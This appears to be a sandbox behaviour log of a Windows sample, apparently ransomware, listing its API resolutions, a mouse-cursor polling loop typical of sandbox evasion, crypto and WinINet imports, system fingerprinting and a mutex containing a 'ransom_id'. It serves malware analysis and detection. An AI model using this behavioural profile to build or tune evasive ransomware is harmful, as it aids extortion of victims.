| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetCursorPos, address_out = 0x75188cd4 |
|
1 | |
| Module | Load | module_name = msvcr100.dll, base_address = 0x73dd0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x73dec544 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-02-28 12:00:25 (UTC) |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76520000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x7653cc2a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x7653cfb9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76533590 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x7653a71d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x7654723c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x765471d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x76547218 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x7653d009 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x7653a6d9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x77433369 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x774382c5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x774374d9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x7653cbd5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x7742488b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x77437a12 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x7744df00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x7747f15a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77432566 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x7653ccd2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x76562f40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x767a1a43 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x76545ae0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x76545c15 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x7656320f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x7653cc08 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x76563439 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x7653cfca |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x76563573 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x7653bd08 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x766fe981 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x765399fc |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Filename | process_name = c:\users\5jghkoaofdp\appdata\roamingeox20.exe, file_name_orig = C:\Users\5JgHKoaOfdp\AppData\RoamingeOX20.eXe, size = 260 |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| System | Get Cursor | x_out = 283, y_out = 876 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 932, y_out = 783 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x76520000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x765475b4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x76547464 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x76547548 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x765336c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileW, address_out = 0x7653d18b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x7655f802 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x7654759c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x7654720c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x76547434 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VerSetConditionMask, address_out = 0x77416269 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x765472d8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x7654607c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x774581f3 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x76539a7f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x7653bd71 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x76563e4c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x765398c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7653d17a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VerifyVersionInfoW, address_out = 0x7653bd2a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x7653916f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77472974 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x7653a45a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x76534cd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleInformation, address_out = 0x765471a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x7654528e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76534eb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreatePipe, address_out = 0x7653d1f8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x76539829 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x76542f0a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76547f7c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x7744fd40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x7744fd00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x765473bc |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x7653989e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x76547368 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x765473e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x7653ce08 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x7654290e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetDiskFreeSpaceW, address_out = 0x7654741c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetWindowsDirectoryW, address_out = 0x76545da4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x7654750c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x7653a669 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x76538f82 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x765337a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x7653bc7e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x7654717c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x7655f71d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileMappingW, address_out = 0x7653a80a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x774347f7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x7654732c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x7653ad26 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x765475fc |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x7653a7c6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = UnmapViewOfFile, address_out = 0x7653bc5c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MapViewOfFile, address_out = 0x7653a636 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x7654747c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x7653be0e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x765448a6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x7653a647 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x765337c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x7653980c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x76544f86 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x765474f4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x76534ee0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76531990 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77450821 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x76540cf8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x7653d01a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76547f64 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x7653bc04 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75180000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x7518b099 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = wsprintfW, address_out = 0x7519c611 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x751898fb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x7518bbb3 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = LoadIconW, address_out = 0x75192249 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 0x751f279e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x7518955e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x7518b08a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x7484c030 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x751920d1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x7518b1e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x7519192b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x7518d2d5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x751898e1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x7484bdea |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x7518c014 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x7518a267 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongW, address_out = 0x7484be3c |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x76bc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = TextOutW, address_out = 0x76c1519c |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x772c8966 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x772c89ff |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x772c89ee |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x772c1164 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptExportKey, address_out = 0x772dba38 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x772db7f5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetKeyParam, address_out = 0x77302135 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x772db806 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x772db9f8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x773020cf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenKey, address_out = 0x772eb9b8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x772dba09 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x772dbcb3 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x772c1186 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x772c1175 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x772c8955 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x75370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x7543b84d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderPathW, address_out = 0x75548299 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x753bbc2d |
|
1 | |
| Module | Load | module_name = CRYPT32.dll, base_address = 0x77040000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x7707c608 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptBinaryToStringA, address_out = 0x7708959f |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x74c10000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x74c298a9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpAddRequestHeadersW, address_out = 0x74c39650 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestW, address_out = 0x74c39310 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectW, address_out = 0x74c27c19 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestW, address_out = 0x74c260aa |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x74c3e7df |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x74c36e3a |
|
1 | |
| Module | Load | module_name = PSAPI.DLL, base_address = 0x76980000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = EnumDeviceDrivers, address_out = 0x769813c2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = GetDeviceDriverBaseNameW, address_out = 0x769813f1 |
|
1 |
Thread 0x8e0
66
24
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77410000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x774e1748 |
|
1 | |
| Mutex | Create | mutex_name = Global\pc_group=WORKGROUP&ransom_id=37c4473eba2ee5af |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77410000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x774e1748 |
|
1 | |
| System | Get Computer Name | result_out = FIVAUF |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 |
|
1 | |
